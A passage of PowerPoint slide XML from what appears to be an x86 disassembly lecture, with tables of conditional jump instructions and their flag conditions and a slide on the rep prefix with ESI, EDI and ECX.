                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="480" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323640" y="2637000"/>
          <a:ext cx="3960000" cy="2819520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1535040"/>
                <a:gridCol w="2425320"/>
              </a:tblGrid>
              <a:tr h="375120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jz loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ZF=1</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jnz loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ZF=0</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r h="446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jne loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>!=</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jg loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&gt;</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r h="446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jge loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&gt;=</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>ja loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Jg, unsinged</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r h="446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jae loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Jge, unsigned</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jl loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&lt;</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="481" name="Table 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4716000" y="2637000"/>
          <a:ext cx="3960000" cy="2819520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1535040"/>
                <a:gridCol w="2425320"/>
              </a:tblGrid>
              <a:tr h="375120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Instruction</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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jle loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>&lt;=</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jb loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Jl, unsinged</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r h="446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jbe loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Jle, unsigned</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jo loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Overflow flag OF=1</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r h="446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>js loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sign flag SF=1</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446760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                        </a:rPr>
                        <a:t>jecxz loc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="2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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>ECX = 0</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r h="3477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3477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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196640"/>
            <a:ext cx="706680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Rep (repeat – until ECX=0)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ESI, EDI used for source and dest. index</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tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ECX used as a counter.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Repeat until ECX = 0 or ZF = 1 (or 0)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="484" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2483640" y="1845000"/>
          <a:ext cx="4608000" cy="2304000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1786320"/>
                <a:gridCol w="2822040"/>
              </a:tblGrid>
              <a:tr h="375120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
